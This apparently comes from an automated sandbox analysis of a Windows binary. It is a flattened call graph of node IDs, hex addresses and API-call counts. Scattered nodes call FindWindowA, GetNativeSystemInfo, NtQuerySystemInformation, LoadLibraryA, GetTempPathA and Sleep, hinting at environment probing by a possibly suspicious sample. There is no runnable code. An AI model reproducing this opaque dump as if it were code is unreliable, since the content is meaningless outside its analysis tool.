78131->78129 78663 31cc580 78131->78663 78672 318b970 78131->78672 78134 318607c 78133->78134 78135 318612e 78134->78135 78140 318608d 78134->78140 78691 31768f0 42 API calls codecvt 78135->78691 78137 31860ba 78141 31a763e moneypunct 42 API calls 78137->78141 78138 3186133 78692 3176690 42 API calls 2 library calls 78138->78692 78140->78137 78143 31860f9 78140->78143 78144 3186102 78140->78144 78145 3186092 codecvt 78140->78145 78142 31860cd 78141->78142 78142->78145 78693 31cc0b9 40 API calls 2 library calls 78142->78693 78143->78137 78143->78138 78147 31a763e moneypunct 42 API calls 78144->78147 78145->77910 78147->78145 78152 318b460 42 API calls 78151->78152 78155 31a5a1e 78152->78155 78153 31a5a9d 78154 3187ff0 40 API calls 78153->78154 78156 31a5aa9 78154->78156 78155->78153 78157 318b970 42 API calls 78155->78157 78156->77913 78157->78155 78159 3187980 42 API calls 78158->78159 78160 3189f3d 78159->78160 78694 3190160 78160->78694 78167 319fd80 78168 3187980 42 API calls 78167->78168 78169 319fdb5 78168->78169 78170 3187980 42 API calls 78169->78170 78171 319f918 78170->78171 78172 3189890 78171->78172 78173 31898e0 78172->78173 78174 318b460 42 API calls 78173->78174 78175 31898f5 78174->78175 78176 3184b60 42 API calls 78175->78176 78177 318990a 78176->78177 78177->77922 78179 318508e 78178->78179 78210 31850f7 codecvt 78178->78210 78181 3185178 78179->78181 78182 318521a 78179->78182 78183 3185190 78179->78183 78184 3185095 78179->78184 78179->78210 78180 31a742b codecvt 5 API calls 78186 3185340 78180->78186 78880 318b800 78181->78880 78185 31a763e moneypunct 42 API calls 78182->78185 78189 31a763e moneypunct 42 API calls 78183->78189 78187 31a763e moneypunct 42 API calls 78184->78187 78190 318522c 78185->78190 78186->77930 78191 31850a4 78187->78191 78192 318519f 78189->78192 78195 3185274 78190->78195 78196 3185346 78190->78196 78190->78210 78193 31a763e moneypunct 42 API calls 78191->78193 78194 3186050 73 API calls 78192->78194 78197 31850d1 78193->78197 78194->78210 78198 318527b 78195->78198 78199 31852a2 78195->78199 78902 3189290 42 API calls 78196->78902 78868 3197f50 78197->78868 78202 318534b 78198->78202 78203 3185286 78198->78203 78204 31a763e moneypunct 42 API calls 78199->78204 78903 3176690 42 API calls 2 library calls 78202->78903 78205 31a763e moneypunct 42 API calls 78203->78205 78204->78210 78207 318528c 78205->78207 78208 3185350 78207->78208 78207->78210 78904 31cc0b9 40 API calls 2 library calls 78208->78904 78210->78180 78210->78210 78213 3185030 73 API calls 78212->78213 78214 319b5ac 78213->78214 78215 31889a0 42 API calls 78214->78215 78216 319b5e2 78215->78216 78217 3185030 73 API calls 78216->78217 78218 319b5ee 78217->78218 78219 31889a0 42 API calls 78218->78219 78220 319b62a 78219->78220 78221 31889a0 42 API calls 78220->78221 78222 319b639 78221->78222 78223 31889a0 42 API calls 78222->78223 78224 319b64b FindWindowA 78223->78224 78225 319a5a0 78224->78225 78226 318b460 42 API calls 78225->78226 78227 319a60a 78226->78227 78228 3184b60 42 API calls 78227->78228 78229 319a61f 78228->78229 78908 318fe80 78229->78908 78232 318b460 42 API calls 78233 319a652 78232->78233 78234 31a71d0 48 API calls 78233->78234 78235 319a66a 78234->78235 78236 3187ff0 40 API calls 78235->78236 78237 319a67b 78236->78237 78238 318b460 42 API calls 78237->78238 78239 319a6a6 78238->78239 78240 31a6fc0 45 API calls 78239->78240 78241 319a6ba 78240->78241 78242 318b460 42 API calls 78241->78242 78243 319a6e7 78242->78243 78244 3184b60 42 API calls 78243->78244 78245 319a6fc 78244->78245 78246 318fe80 42 API calls 78245->78246 78247 319a721 78246->78247 78248 318b460 42 API calls 78247->78248 78249 319a72f 78248->78249 78250 3187ff0 40 API calls 78249->78250 78251 319a75d 78250->78251 78252 318b460 42 API calls 78251->78252 78253 319a788 78252->78253 78254 3184b60 42 API calls 78253->78254 78255 319a79d 78254->78255 78917 3189a20 78255->78917 78258 31a6fc0 45 API calls 78259 319a7c4 78258->78259 78260 318b460 42 API calls 78259->78260 78261 319a7f0 GetNativeSystemInfo 78260->78261 78262 319a81d 78261->78262 78263 319a835 78262->78263 79354 3193320 42 API calls 4 library calls 78262->79354 78920 3176900 78263->78920 78267 3176900 42 API calls 78268 319a86e 78267->78268 78269 318b220 42 API calls 78268->78269 78270 319a883 78268->78270 78269->78270 78926 318a730 78270->78926 78273 3187ff0 40 API calls 78274 319a93e 78273->78274 78275 3187ff0 40 API calls 78274->78275 78276 319a94d 78275->78276 78277 3187ff0 40 API calls 78276->78277 78278 319a959 78277->78278 78279 3187980 42 API calls 78278->78279 78280 319a963 78279->78280 78929 319a120 78280->78929 78285 318b460 42 API calls 78286 319a9d5 78285->78286 78287 3184b60 42 API calls 78286->78287 78288 319a9e5 78287->78288 78289 31889a0 42 API calls 78288->78289 78290 319aa35 78289->78290 78291 3187ff0 40 API calls 78290->78291 78292 319aa41 78291->78292 78996 3199330 78292->78996 78295 319ba10 42 API calls 78296 319aa84 78295->78296 78297 318b460 42 API calls 78296->78297 78298 319aab3 78297->78298 78299 3184b60 42 API calls 78298->78299 78300 319aac3 78299->78300 78301 31889a0 42 API calls 78300->78301 78302 319ab13 78301->78302 78303 3187ff0 40 API calls 78302->78303 78304 319ab1f 78303->78304 79023 3198710 78304->79023 78307 318b460 42 API calls 78308 319ab78 78307->78308 78309 3184b60 42 API calls 78308->78309 78310 319ab88 78309->78310 78311 31889a0 42 API calls 78310->78311 78312 319abc0 78311->78312 78313 3198710 73 API calls 78312->78313 78314 319abea 78313->78314 78315 318b460 42 API calls 78314->78315 78316 319ac19 78315->78316 78317 3184b60 42 API calls 78316->78317 78318 319ac29 78317->78318 78319 31889a0 42 API calls 78318->78319 78320 319ac61 78319->78320 79032 3199f30 78320->79032 78325 31889a0 42 API calls 78326 319acaf 78325->78326 78327 318b460 42 API calls 78326->78327 78328 319aceb 78327->78328 78329 3184b60 42 API calls 78328->78329 78330 319acfb 78329->78330 78331 31889a0 42 API calls 78330->78331 78332 319ad32 78331->78332 78333 3187ff0 40 API calls 78332->78333 78334 319ad3e 78333->78334 79067 3199d60 78334->79067 78337 31cc149 43 API calls 78338 319ad5f 78337->78338 78339 31889a0 42 API calls 78338->78339 78340 319ad9e 78339->78340 78341 318b460 42 API calls 78340->78341 78342 319ade3 78341->78342 78343 3184b60 42 API calls 78342->78343 78344 319adf3 78343->78344 78345 31889a0 42 API calls 78344->78345 78346 319ae43 78345->78346 78347 3187ff0 40 API calls 78346->78347 78348 319ae4f 78347->78348 79096 3199590 78348->79096 78351 3189ee0 74 API calls 78352 319ae93 78351->78352 78353 318b460 42 API calls 78352->78353 78354 319aec2 78353->78354 78355 3184b60 42 API calls 78354->78355 78356 319aed2 78355->78356 78357 31889a0 42 API calls 78356->78357 78358 319af22 78357->78358 78359 3187ff0 40 API calls 78358->78359 78360 319af2e 78359->78360 78361 31cc149 43 API calls 78360->78361 78362 319af47 78361->78362 78363 31889a0 42 API calls 78362->78363 78364 319af86 78363->78364 78365 318b460 42 API calls 78364->78365 78366 319afcb 78365->78366 78367 3184b60 42 API calls 78366->78367 78368 319afdb 78367->78368 78369 31889a0 42 API calls 78368->78369 78370 319b02b 78369->78370 78371 3198710 73 API calls 78370->78371 78372 319b054 78371->78372 78373 318b460 42 API calls 78372->78373 78374 319b080 78373->78374 78375 3184b60 42 API calls 78374->78375 78376 319b090 78375->78376 78377 31889a0 42 API calls 78376->78377 78378 319b0c8 78377->78378 78379 3184c20 42 API calls 78378->78379 78380 319b0da 78379->78380 79164 31761b0 78380->79164 78382 319b0e6 78383 318b460 42 API calls 78382->78383 78384 319b11b 78383->78384 79173 319b760 78384->79173 78387 3187ff0 40 API calls 78388 319b143 78387->78388 79176 31756c0 78388->79176 78390 319b15f 79202 31760c0 78390->79202 78392 319b180 79218 3175c70 78392->79218 78394 319b24c __fread_nolock 78398 318b460 42 API calls 78394->78398 78395 319b187 78395->78394 78396 3186050 73 API calls 78395->78396 78397 319b1c7 78396->78397 78399 318b460 42 API calls 78397->78399 78400 319b28f 78398->78400 78401 319b1ef 78399->78401 78402 3178bf0 78 API calls 78400->78402 78403 31756c0 47 API calls 78401->78403 78404 319b2a5 78402->78404 78405 319b206 78403->78405 78406 3187ff0 40 API calls 78404->78406 78407 31760c0 5 API calls 78405->78407 78408 319b2b4 78406->78408 78409 319b227 78407->78409 78410 3185030 73 API calls 78408->78410 78411 3175c70 19 API calls 78409->78411 78412 319b2c7 78410->78412 78413 319b231 78411->78413 79227 3178de0 GetTempPathA 78412->79227 78415 3187ff0 40 API calls 78413->78415 78417 319b23d 78415->78417 78419 3187ff0 40 API calls 78417->78419 78418 319b332 78420 318b460 42 API calls 78418->78420 78419->78394 78422 319b359 78420->78422 79336 3179500 78422->79336 78425 319b2ef codecvt 79325 31747a0 78425->79325 78426 3187ff0 40 API calls 78427 319b387 78426->78427 78429 319b3f0 78427->78429 78430 319b390 Sleep 78427->78430 78433 31c460e ___std_exception_destroy 14 API calls 78429->78433 78431 318b460 42 API calls 78430->78431 78440 319b3bf 78431->78440 78435 319b3f6 78433->78435 78441 3187ff0 40 API calls 78435->78441 78436 3179500 44 API calls 78436->78440 78439 3187ff0 40 API calls 78439->78440 78440->78429 78440->78430 78440->78436 78440->78439 78442 319b422 78441->78442 78443 3187ff0 40 API calls 78442->78443 78444 319b431 78443->78444 78445 3187ff0 40 API calls 78444->78445 78446 319b440 78445->78446 78447 31889a0 42 API calls 78446->78447 78448 319b44f 78447->78448 78449 3187ff0 40 API calls 78448->78449 78450 319b45e 78449->78450 78451 3187ff0 40 API calls 78450->78451 78452 319b470 78451->78452 78453 31a742b codecvt 5 API calls 78452->78453 78454 319b487 78453->78454 78454->77943 78458 31a5190 78455->78458 78456 31889a0 42 API calls 78457 319f9e2 78456->78457 78457->77946 78457->77948 78458->78456 78460 3187980 42 API calls 78459->78460 78461 3183844 78460->78461 78462 3187980 42 API calls 78461->78462 78463 3183857 78462->78463 78464 3187980 42 API calls 78463->78464 78465 318386a 78464->78465 78466 3187980 42 API calls 78465->78466 78467 318387b 78466->78467 78468 3187980 42 API calls 78467->78468 78469 318388c 78468->78469 78470 3187980 42 API calls 78469->78470 78471 318389d 78470->78471 78472 3187980 42 API calls 78471->78472 78473 31838ae 78472->78473 78474 3187980 42 API calls 78473->78474 78475 31838bf 78474->78475 78476 3185030 73 API calls 78475->78476 78477 31838cf 78476->78477 78478 31889a0 42 API calls 78477->78478 78479 3183909 78478->78479 78480 3185030 73 API calls 78479->78480 78481 3183915 78480->78481 78482 31889a0 42 API calls 78481->78482 78483 318394f 78482->78483 78484 3185030 73 API calls 78483->78484 78485 318395b 78484->78485 78486 31889a0 42 API calls 78485->78486 78487 318399a 78486->78487 78488 3185030 73 API calls 78487->78488 78489 31839a6 78488->78489 78490 31889a0 42 API calls 78489->78490 78491 31839e2 78490->78491 78492 3185030 73 API calls 78491->78492 78493 31839ee 78492->78493 78494 31889a0 42 API calls 78493->78494 78495 3183a2a 78494->78495 78496 3185030 73 API calls 78495->78496 78497 3183a36 78496->78497 78498 31889a0 42 API calls 78497->78498 78543->77938 78545->78018 78546->78022 78547->77957 78548->77969 78558 31ab895 78549->78558 78553 3176b59 78552->78553 78554 3176ba3 78553->78554 78555 318b460 42 API calls 78553->78555 78556 31a742b codecvt 5 API calls 78554->78556 78555->78554 78557 3176bfe 78556->78557 78557->78057 78559 31ab8d1 GetSystemTimeAsFileTime 78558->78559 78560 31a910f 78558->78560 78559->78560 78560->78054 78564 31a7228 __fread_nolock 78561->78564 78571 31a7401 78561->78571 78562 31a742b codecvt 5 API calls 78563 3178c38 78562->78563 78563->78066 78564->78564 78565 31a727d WideCharToMultiByte 78564->78565 78568 31cc92a 44 API calls 78564->78568 78569 318b460 42 API calls 78564->78569 78570 3187ff0 40 API calls 78564->78570 78564->78571 78591 31c4176 40 API calls 2 library calls 78564->78591 78590 31c4176 40 API calls 2 library calls 78565->78590 78568->78564 78569->78564 78570->78564 78571->78562 78573 31a6fff 78572->78573 78578 31a7015 78572->78578 78574 3187ff0 40 API calls 78573->78574 78575 31a700e 78574->78575 78579 31a742b codecvt 5 API calls 78575->78579 78577 3187ff0 40 API calls 78577->78575 78582 31a71b0 78578->78582 78583 31a71ba 78578->78583 78587 318b460 42 API calls 78578->78587 78588 3187ff0 40 API calls 78578->78588 78589 31a713f 78578->78589 78592 31c4593 14 API calls __dosmaperr 78578->78592 78593 31c96c7 43 API calls __fread_nolock 78578->78593 78581 3178c70 78579->78581 78581->78070 78594 31a86ea 42 API calls 2 library calls 78582->78594 78595 31a872a 42 API calls 2 library calls 78583->78595 78587->78578 78588->78578 78589->78577 78590->78564 78591->78564 78592->78578 78593->78578 78597 318d5fb codecvt 78596->78597 78598 318d5d4 78596->78598 78597->78092 78598->78597 78600 318d62b 78598->78600 78601 318d622 78598->78601 78603 318d5e1 78598->78603 78599 31a763e moneypunct 42 API calls 78602 318d5f4 78599->78602 78605 31a763e moneypunct 42 API calls 78600->78605 78601->78603 78604 318d674 78601->78604 78602->78597 78611 31cc0b9 40 API calls 2 library calls 78602->78611 78603->78599 78610 3176690 42 API calls 2 library calls 78604->78610 78605->78597 78609->78091 78610->78602 78613 3185e15 78612->78613 78616 3185e25 codecvt 78613->78616 78617 318b220 78613->78617 78615 3185e6d 78615->78095 78616->78095 78618 318b368 78617->78618 78619 318b24a 78617->78619 78632 31768f0 42 API calls codecvt 78618->78632 78622 318b260 78619->78622 78625 318b2be 78619->78625 78626 318b2b1 78619->78626 78629 318b270 codecvt 78619->78629 78621 318b36d 78633 3176690 42 API calls 2 library calls 78621->78633 78624 31a763e moneypunct 42 API calls 78622->78624 78624->78629 78628 31a763e moneypunct 42 API calls 78625->78628 78626->78621 78626->78622 78628->78629 78631 318b326 codecvt _Mpunct 78629->78631 78634 31cc0b9 40 API calls 2 library calls 78629->78634 78631->78615 78632->78621 78633->78629 78636 319efa6 78635->78636 78646 319f110 codecvt 78635->78646 78637 319f1c2 78636->78637 78638 319efc6 78636->78638 78636->78646 78660 3189290 42 API calls 78637->78660 78639 319efdb 78638->78639 78644 319f040 78638->78644 78645 319f030 78638->78645 78651 319eff1 codecvt 78638->78651 78643 31a763e moneypunct 42 API calls 78639->78643 78641 319f1c7 78661 3176690 42 API calls 2 library calls 78641->78661 78643->78651 78647 31a763e moneypunct 42 API calls 78644->78647 78645->78639 78645->78641 78646->78116 78647->78651 78654 319f0de _Mpunct 78651->78654 78662 31cc0b9 40 API calls 2 library calls 78651->78662 78654->78116 78661->78651 78664 31cc597 78663->78664 78665 31cc5b3 78663->78665 78664->78131 78666 31d3639 __Getctype 40 API calls 78665->78666 78667 31cc5b8 78666->78667 78668 31d44c6 __Getctype 40 API calls 78667->78668 78669 31cc5c8 78668->78669 78669->78664 78687 31d655d 43 API calls 3 library calls 78669->78687 78671 31cc5fa 78671->78131 78673 318ba9a 78672->78673 78677 318b994 78672->78677 78688 31768f0 42 API calls codecvt 78673->78688 78675 318ba9f 78689 3176690 42 API calls 2 library calls 78675->78689 78676 318b9ba codecvt 78686 318ba5c codecvt _Mpunct 78676->78686 78690 31cc0b9 40 API calls 2 library calls 78676->78690 78677->78676 78679 318ba08 78677->78679 78680 318b9fb 78677->78680 78682 318b9aa 78677->78682 78683 31a763e moneypunct 42 API calls 78679->78683 78680->78675 78680->78682 78681 31a763e moneypunct 42 API calls 78681->78676 78682->78681 78683->78676 78686->78131 78687->78671 78688->78675 78689->78676 78691->78138 78692->78142 78695 31901ac 78694->78695 78696 31c9a4a moneypunct 40 API calls 78695->78696 78697 319027f 78696->78697 78774 318ded0 78697->78774 78699 3189fad 78700 318c590 78699->78700 78701 318c5de __fread_nolock 78700->78701 78702 318c867 78700->78702 78851 318d860 42 API calls 78701->78851 78860 3191710 42 API calls codecvt 78702->78860 78704 318c8b2 78705 318ded0 45 API calls 78704->78705 78706 318c8c2 78705->78706 78709 318b460 42 API calls 78706->78709 78711 318c9e6 78706->78711 78708 318c662 78852 3190970 74 API calls codecvt 78708->78852 78714 318c8fe 78709->78714 78710 318ca46 78867 318d7d0 40 API calls _Mpunct 78710->78867 78711->78710 78715 3187980 42 API calls 78711->78715 78861 318d9b0 42 API calls codecvt 78714->78861 78719 318c9f9 78715->78719 78716 318c677 78720 318ded0 45 API calls 78716->78720 78717 318c862 78721 31a742b codecvt 5 API calls 78717->78721 78723 31889a0 42 API calls 78719->78723 78724 318c687 78720->78724 78726 3189fc0 78721->78726 78722 318c919 78862 3191540 42 API calls codecvt 78722->78862 78723->78710 78725 318c79c 78724->78725 78728 318b460 42 API calls 78724->78728 78729 318c7e9 78725->78729 78730 318c7a2 78725->78730 78769 318c310 78726->78769 78732 318c6b7 78728->78732 78734 318c850 78729->78734 78738 3187980 42 API calls 78729->78738 78733 3187980 42 API calls 78730->78733 78731 318c947 78863 318dcd0 42 API calls codecvt 78731->78863 78853 318d9b0 42 API calls codecvt 78732->78853 78737 318c7af 78733->78737 78859 318d6b0 42 API calls 78734->78859 78745 31889a0 42 API calls 78737->78745 78738->78737 78739 318c962 78864 3192300 42 API calls Concurrency::cancel_current_task 78739->78864 78741 318c6cf 78854 3191540 42 API calls codecvt 78741->78854 78743 318c972 78746 3187ff0 40 API calls 78743->78746 78745->78734 78748 318c981 78746->78748 78747 318c6fd 78855 318dcd0 42 API calls codecvt 78747->78855 78865 31bf79c 14 API calls ___std_exception_destroy 78748->78865 78751 318c718 78856 31916d0 42 API calls Concurrency::cancel_current_task 78751->78856 78752 318c9ab 78866 31bf79c 14 API calls ___std_exception_destroy 78752->78866 78755 318c72b 78757 3187ff0 40 API calls 78755->78757 78756 318c9c5 78758 3187ff0 40 API calls 78756->78758 78759 318c73a 78757->78759 78760 318c9d7 78758->78760 78857 31bf79c 14 API calls ___std_exception_destroy 78759->78857 78762 3187ff0 40 API calls 78760->78762 78762->78711 78763 318c764 78858 31bf79c 14 API calls ___std_exception_destroy 78763->78858 78765 318c77e 78766 3187ff0 40 API calls 78765->78766 78767 318c790 78766->78767 78768 3187ff0 40 API calls 78767->78768 78768->78725 78770 3187ff0 40 API calls 78769->78770 78771 318c356 78770->78771 78772 3187dc0 40 API calls 78771->78772 78773 3189fcf 78772->78773 78773->78167 78775 318dee9 78774->78775 78779 318df2c 78774->78779 78840 318f740 42 API calls 78775->78840 78778 318deee 78778->78779 78841 318f740 42 API calls 78778->78841 78843 318e350 42 API calls 78779->78843 78780 318df83 78781 318e0c9 78780->78781 78783 318dfda 78780->78783 78784 318e03b 78780->78784 78785 318df9e 78780->78785 78786 318e09f 78780->78786 78787 318dfb2 78780->78787 78788 318e0b5 78780->78788 78789 318e016 78780->78789 78790 318e089 78780->78790 78791 318dfee 78780->78791 78792 318e002 78780->78792 78793 318e064 78780->78793 78794 318dfc6 78780->78794 78799 31a742b codecvt 5 API calls 78781->78799 78811 31a742b codecvt 5 API calls 78783->78811 78847 318e3e0 42 API calls 78784->78847 78805 31a742b codecvt 5 API calls 78785->78805 78850 318e4a0 45 API calls 2 library calls 78786->78850 78807 31a742b codecvt 5 API calls 78787->78807 78798 31a742b codecvt 5 API calls 78788->78798 78846 318e3e0 42 API calls 78789->78846 78849 318ed70 42 API calls codecvt 78790->78849 78797 31a742b codecvt 5 API calls 78791->78797 78800 31a742b codecvt 5 API calls 78792->78800 78848 318e3e0 42 API calls 78793->78848 78809 31a742b codecvt 5 API calls 78794->78809 78795 318defc 78810 318df11 78795->78810 78842 318f740 42 API calls 78795->78842 78814 318dffe 78797->78814 78812 318e0c5 78798->78812 78815 318e0e0 78799->78815 78816 318e012 78800->78816 78803 318df5b 78803->78780 78803->78781 78844 318ec40 42 API calls 78803->78844 78845 318e350 42 API calls 78803->78845 78821 318dfae 78805->78821 78822 318dfc2 78807->78822 78825 318dfd6 78809->78825 78813 31a742b codecvt 5 API calls 78810->78813 78826 318dfea 78811->78826 78812->78699 78827 318df28 78813->78827 78814->78699 78815->78699 78816->78699 78817 318e02c 78828 31a742b codecvt 5 API calls 78817->78828 78818 318e055 78829 31a742b codecvt 5 API calls 78818->78829 78819 318e07a 78831 31a742b codecvt 5 API calls 78819->78831 78820 318e090 78832 31a742b codecvt 5 API calls 78820->78832 78821->78699 78822->78699 78824 318e0a6 78833 31a742b codecvt 5 API calls 78824->78833 78825->78699 78826->78699 78827->78699 78835 318e037 78828->78835 78836 318e060 78829->78836 78837 318e085 78831->78837 78838 318e09b 78832->78838 78839 318e0b1 78833->78839 78834 318df0a 78834->78779 78834->78810 78835->78699 78836->78699 78837->78699 78838->78699 78839->78699 78840->78778 78841->78795 78842->78834 78843->78803 78844->78803 78845->78803 78846->78817 78847->78818 78848->78819 78849->78820 78850->78824 78851->78708 78852->78716 78853->78741 78854->78747 78855->78751 78856->78755 78857->78763 78858->78765 78859->78717 78860->78704 78861->78722 78862->78731 78863->78739 78864->78743 78865->78752 78866->78756 78867->78717 78869 3197f98 78868->78869 78879 3198040 78868->78879 78870 31a763e moneypunct 42 API calls 78869->78870 78871 3197fba 78870->78871 78872 3186050 73 API calls 78871->78872 78873 3197fd0 78872->78873 78874 3185030 73 API calls 78873->78874 78875 3197fe0 78874->78875 78876 3197f50 73 API calls 78875->78876 78877 3198031 78876->78877 78878 3197f50 73 API calls 78877->78878 78878->78879 78879->78210 78881 31a763e moneypunct 42 API calls 78880->78881 78882 318b83c 78881->78882 78883 318b95d 78882->78883 78885 318b884 78882->78885 78894 318b919 78882->78894 78905 3189290 42 API calls 78883->78905 78884 31a742b codecvt 5 API calls 78886 318b959 78884->78886 78888 318b8c0 78885->78888 78889 318b897 78885->78889 78898 318b88b 78885->78898 78886->78210 78893 31a763e moneypunct 42 API calls 78888->78893 78890 318b962 78889->78890 78891 318b8a2 78889->78891 78906 3176690 42 API calls 2 library calls 78890->78906 78896 31a763e moneypunct 42 API calls 78891->78896 78893->78898 78894->78884 78895 3185030 73 API calls 78895->78898 78899 318b8a8 78896->78899 78897 318b967 78907 31cc0b9 40 API calls 2 library calls 78897->78907 78898->78894 78898->78895 78899->78897 78899->78898 78903->78208 78906->78897 78909 318feba 78908->78909 78910 318fee0 78908->78910 78909->78232 79355 3198470 42 API calls 78910->79355 78912 318fef9 79356 3192390 42 API calls codecvt 78912->79356 78914 318ff0e 78915 31bf9ce Concurrency::cancel_current_task KiUserExceptionDispatcher 78914->78915 78916 318ff1f 78915->78916 79357 3189920 78917->79357 78919 3189a52 78919->78258 78921 317694c 78920->78921 78922 31769be 78921->78922 78923 318b460 42 API calls 78921->78923 78924 31a742b codecvt 5 API calls 78922->78924 78923->78922 78925 3176a1a 78924->78925 78925->78267 79373 318d3b0 78926->79373 78928 318a76e 78928->78273 78930 318b460 42 API calls 78929->78930 78931 319a197 78930->78931 78932 3184b60 42 API calls 78931->78932 78933 319a1a9 78932->78933 78934 318fe80 42 API calls 78933->78934 78935 319a1d7 78934->78935 78936 318b460 42 API calls 78935->78936 78937 319a1e8 78936->78937 78938 31a71d0 48 API calls 78937->78938 78939 319a209 78938->78939 78940 3187ff0 40 API calls 78939->78940 78941 319a21a 78940->78941 78942 318b460 42 API calls 78941->78942 78943 319a245 78942->78943 78944 3184b60 42 API calls 78943->78944 78945 319a25b 78944->78945 78946 3189a20 42 API calls 78945->78946 78947 319a26e 78946->78947 78948 31a6fc0 45 API calls 78947->78948 78949 319a27f __fread_nolock 78948->78949 78950 319a565 78949->78950 78953 319a2ff 78949->78953 78954 319a516 78949->78954 78951 31a742b codecvt 5 API calls 78950->78951 78952 319a57e 78951->78952 78989 319ba10 78952->78989 78955 319a308 78953->78955 78956 319a3a0 78953->78956 78954->78950 78957 318b460 42 API calls 78954->78957 78958 319a34a 78955->78958 78959 319a316 78955->78959 78956->78950 78961 319a468 78956->78961 78962 319a40f 78956->78962 78963 319a4c1 78956->78963 78964 319a3b6 78956->78964 78960 319a33e 78957->78960 78966 319a38a 78958->78966 78967 319a374 78958->78967 78965 318b460 42 API calls 78959->78965 78979 3184b60 42 API calls 78960->78979 78968 319a4ab 78961->78968 78969 319a495 78961->78969 78974 319a43c 78962->78974 78975 319a452 78962->78975 78972 319a4ec 78963->78972 78973 319a501 78963->78973 78970 319a3f9 78964->78970 78971 319a3e3 78964->78971 78965->78960 78977 318b460 42 API calls 78966->78977 78976 318b460 42 API calls 78967->78976 78981 318b460 42 API calls 78968->78981 78978 318b460 42 API calls 78969->78978 78982 318b460 42 API calls 78970->78982 78980 318b460 42 API calls 78971->78980 78983 318b460 42 API calls 78972->78983 78985 318b460 42 API calls 78973->78985 78984 318b460 42 API calls 78974->78984 78986 318b460 42 API calls 78975->78986 78976->78960 78977->78960 78978->78960 78987 319a55d 78979->78987 78980->78960 78981->78960 78982->78960 78983->78960 78984->78960 78985->78960 78986->78960 79393 3190330 42 API calls codecvt 78987->79393 78990 31889a0 42 API calls 78989->78990 78991 319ba5e 78990->78991 78992 31a763e moneypunct 42 API calls 78991->78992 78993 319ba70 78992->78993 78994 31a742b codecvt 5 API calls 78993->78994 78995 319a9a6 78994->78995 78995->78285 78997 318b460 42 API calls 78996->78997 78998 31993a3 78997->78998 78999 3184b60 42 API calls 78998->78999 79000 31993b5 78999->79000 79001 318fe80 42 API calls 79000->79001 79002 31993e9 79001->79002 79003 318b460 42 API calls 79002->79003 79004 3199400 79003->79004 79005 31a71d0 48 API calls 79004->79005 79006 3199421 79005->79006 79007 3187ff0 40 API calls 79006->79007 79008 3199432 79007->79008 79009 318b460 42 API calls 79008->79009 79010 319945d 79009->79010 79011 3184b60 42 API calls 79010->79011 79012 319946f 79011->79012 79013 3189a20 42 API calls 79012->79013 79014 3199482 79013->79014 79015 31a6fc0 45 API calls 79014->79015 79016 3199493 79015->79016 79016->79016 79017 318b460 42 API calls 79016->79017 79018 31994fc 79017->79018 79019 3187ff0 40 API calls 79018->79019 79020 3199568 79019->79020 79021 31a742b codecvt 5 API calls 79020->79021 79022 3199581 79021->79022 79022->78295 79024 31889a0 42 API calls 79023->79024 79025 319874d 79024->79025 79026 31a763e moneypunct 42 API calls 79025->79026 79027 319875f 79026->79027 79028 3186050 73 API calls 79027->79028 79029 319877c 79028->79029 79030 31a742b codecvt 5 API calls 79029->79030 79031 31987aa 79030->79031 79031->78307 79033 318b460 42 API calls 79032->79033 79034 3199f9a 79033->79034 79035 3184b60 42 API calls 79034->79035 79036 3199fac 79035->79036 79037 318fe80 42 API calls 79036->79037 79038 3199fd4 79037->79038 79039 318b460 42 API calls 79038->79039 79040 3199fe5 79039->79040 79041 31a71d0 48 API calls 79040->79041 79042 319a003 79041->79042 79043 3187ff0 40 API calls 79042->79043 79044 319a014 79043->79044 79045 318b460 42 API calls 79044->79045 79046 319a03f 79045->79046 79047 3184b60 42 API calls 79046->79047 79048 319a051 79047->79048 79049 3189a20 42 API calls 79048->79049 79050 319a061 79049->79050 79051 31a6fc0 45 API calls 79050->79051 79052 319a072 79051->79052 79053 319a0b9 79052->79053 79054 319a08c NtQuerySystemInformation 79052->79054 79055 318b460 42 API calls 79053->79055 79054->79053 79056 319a092 79054->79056 79057 319a0a6 79055->79057 79058 3176900 42 API calls 79056->79058 79059 31a742b codecvt 5 API calls 79057->79059 79058->79057 79060 319a10e 79059->79060 79061 31cc149 79060->79061 79062 31cc15c __fread_nolock 79061->79062 79394 31c8b00 79062->79394 79064 31cc176 79408 31c2f3e 79064->79408 79068 318b460 42 API calls 79067->79068 79069 3199dc4 79068->79069 79070 3184b60 42 API calls 79069->79070 79071 3199dd6 79070->79071 79072 318fe80 42 API calls 79071->79072 79073 3199dfb 79072->79073 79074 318b460 42 API calls 79073->79074 79075 3199e09 79074->79075 79076 31a71d0 48 API calls 79075->79076 79077 3199e21 79076->79077 79078 3187ff0 40 API calls 79077->79078 79079 3199e2f 79078->79079 79080 318b460 42 API calls 79079->79080 79081 3199e57 79080->79081 79082 3184b60 42 API calls 79081->79082 79083 3199e69 79082->79083 79084 3189a20 42 API calls 79083->79084 79085 3199e79 79084->79085 79086 31a6fc0 45 API calls 79085->79086 79087 3199e8a 79086->79087 79088 3199ec9 79087->79088 79090 3199ea4 NtQuerySystemInformation 79087->79090 79089 318b460 42 API calls 79088->79089 79091 3199eb6 79089->79091 79090->79088 79092 3199eaa 79090->79092 79094 31a742b codecvt 5 API calls 79091->79094 79093 3176900 42 API calls 79092->79093 79093->79091 79095 3199f1e 79094->79095 79095->78337 79097 318b460 42 API calls 79096->79097 79098 3199600 79097->79098 79099 3184b60 42 API calls 79098->79099 79100 3199612 79099->79100 79101 318fe80 42 API calls 79100->79101 79102 3199640 79101->79102 79103 318b460 42 API calls 79102->79103 79104 3199651 79103->79104 79105 31a71d0 48 API calls 79104->79105 79106 3199672 79105->79106 79107 3187ff0 40 API calls 79106->79107 79108 3199683 79107->79108 79109 318b460 42 API calls 79108->79109 79110 31996ae 79109->79110 79111 3184b60 42 API calls 79110->79111 79112 31996c0 79111->79112 79113 3189a20 42 API calls 79112->79113 79114 31996d3 79113->79114 79115 31a6fc0 45 API calls 79114->79115 79116 31996e4 79115->79116 79117 318b460 42 API calls 79116->79117 79118 3199711 79117->79118 79119 3184b60 42 API calls 79118->79119 79120 3199723 79119->79120 79121 318fe80 42 API calls 79120->79121 79122 3199751 79121->79122 79123 318b460 42 API calls 79122->79123 79124 3199762 LoadLibraryA 79123->79124 79126 3187ff0 40 API calls 79124->79126 79127 3199799 79126->79127 79128 318b460 42 API calls 79127->79128 79129 31997c4 79128->79129 79130 3184b60 42 API calls 79129->79130 79131 31997d6 79130->79131 79132 3189a20 42 API calls 79131->79132 79133 31997e9 79132->79133 79134 31a6fc0 45 API calls 79133->79134 79135 31997fa 79134->79135 79136 319984d 79135->79136 79142 319987f 79135->79142 79137 318b460 42 API calls 79136->79137 79151 319986c _Mpunct 79137->79151 